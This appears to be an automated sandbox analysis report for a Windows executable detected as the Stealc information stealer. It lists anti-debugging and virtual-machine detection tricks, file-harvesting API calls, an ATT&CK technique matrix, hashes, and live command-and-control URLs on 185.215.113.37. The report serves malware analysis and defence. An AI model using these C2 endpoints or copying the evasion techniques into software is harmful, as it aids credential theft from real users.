                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17CAF second address: A17D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FFBC8B2DA98h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D2C77h] 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FFBC8B2DA98h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 call 00007FFBC8B2DA99h 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D0B second address: A17D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FFBC91A3BD6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D1A second address: A17D3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FFBC8B2DA9Eh 0x0000000e pop esi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FFBC8B2DA96h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D3F second address: A17D59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007FFBC91A3BD6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FFBC91A3BD6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D59 second address: A17D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D69 second address: A17D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17F94 second address: A17FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFBC8B2DAA6h 0x0000000f nop 0x00000010 sub dx, 1A78h 0x00000015 push dword ptr [ebp+122D2A3Bh] 0x0000001b mov dx, 1DFCh 0x0000001f push 1C538DC7h 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pushad 0x00000028 popad 0x00000029 pop esi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A198A4 second address: A198AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A198AE second address: A198D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC8B2DA98h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBC8B2DAA7h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A198D7 second address: A198FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 jc 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FFBC91A3BDFh 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1949C second address: A194A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A194A5 second address: A194B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jp 00007FFBC91A3BD6h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C037C second address: 51C0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C03C8 second address: 51C03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C03CC second address: 51C03D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C03D2 second address: 51C0451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dh, C0h 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFBC91A3BE3h 0x0000001b sbb cx, E4BEh 0x00000020 jmp 00007FFBC91A3BE9h 0x00000025 popfd 0x00000026 mov di, cx 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushad 0x0000002e call 00007FFBC91A3BE6h 0x00000033 pop eax 0x00000034 call 00007FFBC91A3BDBh 0x00000039 pop esi 0x0000003a popad 0x0000003b movsx edx, ax 0x0000003e popad 0x0000003f pop ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C0451 second address: 51C046E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C046E second address: 51C0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C0474 second address: 51C0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 791BA3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 791AD2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 931174 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 93158E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 92FDF7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9BBE28 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00544910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0053DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0053E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00544570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0053ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0053BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0053DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0053F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00543EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00531160 GetSystemInfo,ExitProcess,0_2_00531160
                Source: file.exe, file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware@
                Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWGe>
                Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13436
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13487
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13447
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13433
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13455
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005345C0 VirtualProtect ?,00000004,00000100,000000000_2_005345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00549860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549750 mov eax, dword ptr fs:[00000030h]0_2_00549750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00547850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00549600
                Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: file.exeBinary or memory string: y Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00547B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00546920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00546920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00547850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00547A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00547A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/BiQfile.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/C84BCA9C91821060E9A79ufile.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpFfile.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phphifile.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/&file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/wsfile.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpJfile.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpConnectionSettingsfile.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.37oZfile.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.37
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1531682
                                Start date and time:2024-10-11 15:59:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 2m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 81%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 81
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                SecuriteInfo.com.Win32.Evo-gen.28528.9811.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                nU3dGuezsg.exeGet hashmaliciousAmadey, StealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                SecuriteInfo.com.Win32.Evo-gen.28528.9811.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                • 185.215.113.103
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                nU3dGuezsg.exeGet hashmaliciousAmadey, StealcBrowse
                                • 185.215.113.103
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947834924142802
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'813'504 bytes
                                MD5:1ad0ccf6d6aa03ebe1f0d87e2b21e748
                                SHA1:a48f39c5b5a61d2aabf0d98844041e6b8ee3861e
                                SHA256:3b22774fae4edcd3086ddfda63b8d6a7b469081f69845521570dc42f70a05e4d
                                SHA512:af2400ae871605233e336e47817bb4c26db88e6e45f77770fc12267067d4b50d80317f3ba025c409f2843f525a35eb71b4ad87f69cdd69d2604d5046bfb1d6c4
                                SSDEEP:24576:qR6I6Gy6+2lwI9lznUv3dVtb+irEDPXupObmQkzdHgjmV3ke4Ruztm8Z1xVL7Te:qRdXPlzUvXMUufuobdk5AkkezZZx7y
                                TLSH:CE8533AEEE27B3DDC4FA52B41C9BCFE4D940935E48AFCA4421345DB4B85F2DC2826854
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

